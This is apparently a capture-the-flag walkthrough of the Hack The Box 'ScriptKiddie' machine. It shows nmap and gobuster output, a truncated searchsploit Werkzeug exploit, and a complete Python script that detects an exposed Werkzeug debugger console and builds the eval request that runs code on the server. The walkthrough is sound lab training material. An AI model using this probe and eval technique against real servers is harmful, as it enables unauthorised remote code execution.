Updated: Jul 30, 2021
```
# Nmap 7.91 scan initiated Sat May 29 10:06:38 2021 as: nmap -sCV -vv -oA nmap/nmap_scriptkiddieScript 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up, received echo-reply ttl 63 (0.017s latency).
Scanned at 2021-05-29 10:06:38 BST for 7s
Not shown: 998 closed ports
Reason: 998 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| ssh-rsa [key elided]
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo=
|   256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: POST HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 29 10:06:45 2021 -- 1 IP address (1 host up) scanned in 7.53 seconds
```
OK, two ports open:
22: SSH, whose banner tells us it's an Ubuntu box
5000: an unusual port, but nmap says it's running a web server (Werkzeug, a Python WSGI server, which points at a Python web application)
A further full TCP port scan didn't find anything else.
Let's go see what's at port 5000.
Web Server on port 5000
OK, it looks simple enough, but there are no links to anywhere else. Let's give it a quick directory enumeration.
```
gobuster dir -u http://10.10.10.226:5000/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
```
Turned up nothing.
Right, it looks like it's just a single web application page. There has to be a way in through this page somewhere, so let's dig into the application.
Three input functions perform some server-side commands based on user input:
The nmap option does work, but I can't do much with it, as the input field won't accept anything other than the required IP-formatted string. I tried to manipulate the input in BurpSuite, but nothing seems to work.
The payloads option is more interesting, as it takes a file upload. It has three options: Windows, Linux and Android. When supplied with input it generates a Meterpreter payload, so this must be using msfvenom or msfpayload to generate it on the back end. I will need to investigate this further.
The sploits option appears to search the searchsploit database on the back end. I've had a play with the inputs, but it only seems to search the database and I can't see a way to break out. I'll have a look at this in BurpSuite and see if there's something more interesting here.
Exploiting The Host
OK, so the nmap field is pretty boring; I think the other two areas are the more likely way into this box.
Poking at the Searchsploit Input Field
Let's take a look at the sploits option and see if there's anything there we can do.
First let's capture a request in BurpSuite:
OK, this brings back a lot of entries from the searchsploit database, and they match what I have on my system, so it looks like a real copy of the Exploit-DB database rather than a canned response. Taken together with the msfvenom-style payload generator, this suggests the real offensive tooling (searchsploit and Metasploit) is installed on this box, which could be interesting.
I tried playing around with the input parameters, but nothing very interesting happened: some changes and some error messages, but nothing that indicated a way onto the box, so I need to rethink this approach.
Let's have a look at the response header:
We can see it's running the Werkzeug/0.16.1 web server. Let's take a look and see if there are any known vulnerabilities for it.
Searching the searchsploit database on my host, I see there is a Python script that can execute code on the server if the application has Werkzeug's interactive debug console enabled.
Let's take a look at the exploit code:
```python
#!/usr/bin/env python
import requests
import sys
import re
import urllib

# usage : python exploit.py 192.168.56
```
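Before running someone else's exploit script it is worth checking the precondition it depends on. The following is an added example written for this writeup; it is not the searchsploit script above and not code from the target application. It fetches Werkzeug's debugger console page (`/console`), parses the `<script>` block the debugger emits (`CONSOLE_MODE`, `EVALEX`, `EVALEX_TRUSTED`, `SECRET`), and builds the same query string the debugger's own JavaScript sends to evaluate code (`__debugger__=yes&cmd=...&frm=0&s=<secret>`). The two HTML samples and the secret value in them are constructed for the offline test; the target URL is the one from the scan above. One caveat a practitioner should know: since Werkzeug 0.11 the console is additionally PIN-protected unless the PIN was disabled, and `EVALEX_TRUSTED` in the page tells you whether the PIN check is already satisfied for your session, so a rendered console page alone does not guarantee that commands will run.

```python
"""Detect an exposed Werkzeug debugger console and build its eval request.

Added example for this writeup, not the target's code or the searchsploit
exploit.  Parsing follows the layout of Werkzeug's console.html template;
the sample HTML and the secret in it are constructed test data.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

CONSOLE_PATH = "/console"

# Constructed: what /console looks like when the debugger is on but the
# session has not passed the PIN check (EVALEX_TRUSTED = false).
SAMPLE_CONSOLE_HTML = """<!DOCTYPE html>
<html><head><title>Console // Werkzeug Debugger</title>
<script type="text/javascript">
  var TRACEBACK = -1,
      CONSOLE_MODE = true,
      EVALEX = true,
      EVALEX_TRUSTED = false,
      SECRET = "0xDeadBeefCafe1234";
</script></head><body></body></html>"""

# Constructed: a deployment without the debugger just returns a 404 page.
SAMPLE_NOT_FOUND_HTML = """<!doctype html>
<title>404 Not Found</title>
<h1>Not Found</h1>"""


def _flag(html, name):
    """Return the boolean value of `var NAME = true/false` or None if absent."""
    m = re.search(r"\b" + re.escape(name) + r"\s*=\s*(true|false)", html)
    return None if m is None else m.group(1) == "true"


def parse_console_page(html):
    """Parse the debugger's script block out of a response body.

    console: the page is the debugger console at all
    evalex:  evaluation of submitted code is switched on
    trusted: the PIN check is already satisfied (commands will execute)
    secret:  per-process token that every console request must carry
    """
    console = _flag(html, "CONSOLE_MODE")
    if not console:
        return {"console": False, "evalex": False, "trusted": False, "secret": None}
    m = re.search(r'\bSECRET\s*=\s*"([^"]*)"', html)
    return {
        "console": True,
        "evalex": bool(_flag(html, "EVALEX")),
        "trusted": bool(_flag(html, "EVALEX_TRUSTED")),
        "secret": m.group(1) if m else None,
    }


def console_exploitable(info):
    """True only when code sent to the console would actually be evaluated."""
    return bool(info["console"] and info["evalex"] and info["trusted"] and info["secret"])


def console_eval_params(secret, code, frame="0"):
    """Query string the debugger's JavaScript sends to evaluate `code`.

    Frame 0 is the standalone console's namespace; `s` must match SECRET.
    """
    return urllib.parse.urlencode(
        {"__debugger__": "yes", "cmd": code, "frm": frame, "s": secret}
    )


def console_eval_url(base_url, secret, code):
    return base_url.rstrip("/") + CONSOLE_PATH + "?" + console_eval_params(secret, code)


def probe_console(base_url, timeout=5):
    """Fetch /console from a live host and parse it (network; not tested)."""
    url = base_url.rstrip("/") + CONSOLE_PATH
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:  # a 404 still carries a body
        body = exc.read().decode("utf-8", "replace")
    return parse_console_page(body)


if __name__ == "__main__":
    target = "http://10.10.10.226:5000"  # host and port from the nmap scan
    info = probe_console(target)
    print(info)
    if console_exploitable(info):
        print("console exposed, e.g.:", console_eval_url(target, info["secret"], "1+1"))
    elif info["console"]:
        print("console rendered but PIN-protected; the eval request will be refused")
    else:
        print("no debugger console at", target + CONSOLE_PATH)
```

Run it against the box and you learn in one request whether the Werkzeug debug-console path is open before spending time on the exploit script. If `console` is true but `trusted` is false, the app is running with the debugger but the PIN is in force, and the script above will get its commands refused.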